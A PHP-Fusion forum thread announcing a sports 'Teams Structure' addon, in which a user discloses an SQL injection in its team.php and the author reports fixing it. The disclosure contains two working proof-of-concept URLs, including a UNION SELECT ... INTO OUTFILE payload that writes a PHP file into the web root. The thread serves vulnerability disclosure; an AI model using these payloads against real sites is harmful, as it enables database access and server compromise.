Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?

Teams Structure v3.0

Asked Modified Viewed 8,160 times
J
jikaka
J
jikaka 10
www.rusfusion.ru - russian nss
  • Veteran Member, joined since
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
  • Started this discussions
asked
Veteran Member

www.php-fusion.co.uk/infusions/addondb/img/screenshots/t_527.jpgPlugin that allows the site to have a list of all teams / clubs (eg football or hockey) with the playing staff, displaying the standings with the position of command or a list of the best strikers of a championship.



-- View this Addon --
0 replies

9 posts

B
Bruno
B
Bruno 10
  • Junior Member, joined since
  • Contributed 48 posts on the community forums.
  • Started 13 threads in the forums
answered
Junior Member

looking good, keep up the great work :D
0 replies
S
smokeman
S
  • Veteran Member, joined since
  • Contributed 920 posts on the community forums.
  • Started 79 threads in the forums
answered
Veteran Member

Looking good yes - but it have a possibility to insert an SQL
injection.

Details:
The "team_id" variable is not probably sanitized before using in SQL query
in "team.php", the attack can be elevated as shown in second POC to bypass
PHPFusion's GET variable XSS filter. by using back-ticks instead of
brackets used in any php function in that case shell_exec().

Condition:
magic_quotes_gpc = Off

POC:
*http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select
'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17

*http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select '1','2','<?php $out=id;echo $out;
?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into
outfile '/var/www/php-fusion/files/images/test.php

- remove the * from the link.
Edited by smokeman on 20-01-2011 01:09,
0 replies
J
jikaka
J
jikaka 10
www.rusfusion.ru - russian nss
  • Veteran Member, joined since
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
  • Started this discussions
answered
Veteran Member

:|
@smokeman, there is a proposal to eliminate the errors?
0 replies
S
smokeman
S
  • Veteran Member, joined since
  • Contributed 920 posts on the community forums.
  • Started 79 threads in the forums
answered
Veteran Member

I don't have much knowledge in hacking - so no, sry. :|

But I think you should write to admins and ask them to remove it from the download immediately!


Edit: http://www.google.dk/#hl=da&sourc...a434e89542
- pick one for yourself. ;)

Soo many results in just 4 days (the day this sql injection was disvovered)
Edited by smokeman on 20-01-2011 12:38,
0 replies
J
jikaka
J
jikaka 10
www.rusfusion.ru - russian nss
  • Veteran Member, joined since
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
  • Started this discussions
answered
Veteran Member

thanks, I will fix the problem ...
Edited by jikaka on 20-01-2011 13:22,
0 replies
S
smokeman
S
  • Veteran Member, joined since
  • Contributed 920 posts on the community forums.
  • Started 79 threads in the forums
answered
Veteran Member

When you're at it: There's missing an empty index.php file in the following two maps: "locale" and "ink". I wonder how it got passed by the Addon Approval ?
Edited by smokeman on 20-01-2011 13:34,
0 replies
J
jikaka
J
jikaka 10
www.rusfusion.ru - russian nss
  • Veteran Member, joined since
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
  • Started this discussions
answered
Veteran Member

:)
0 replies
J
jikaka
J
jikaka 10
www.rusfusion.ru - russian nss
  • Veteran Member, joined since
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
  • Started this discussions
answered
Veteran Member

@smokeman, I fixed the bug, I want to again say thank you for your timely information ...
in the coming days, plan to release v4.0, which will be all fixed and new functions
0 replies
S
smokeman
S
  • Veteran Member, joined since
  • Contributed 920 posts on the community forums.
  • Started 79 threads in the forums
answered
Veteran Member

No Problem m8 - Im just glad to help where I can. I've not being much aroun the community for a time (about 3 months) - before I "started up" again.

Hehe, and now Im hooked - again.. :)
0 replies

Labels

None yet

Statistics

  • Views 0 views
  • Posts 9 posts
  • Votes 0 votes
  • Topic users 3 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet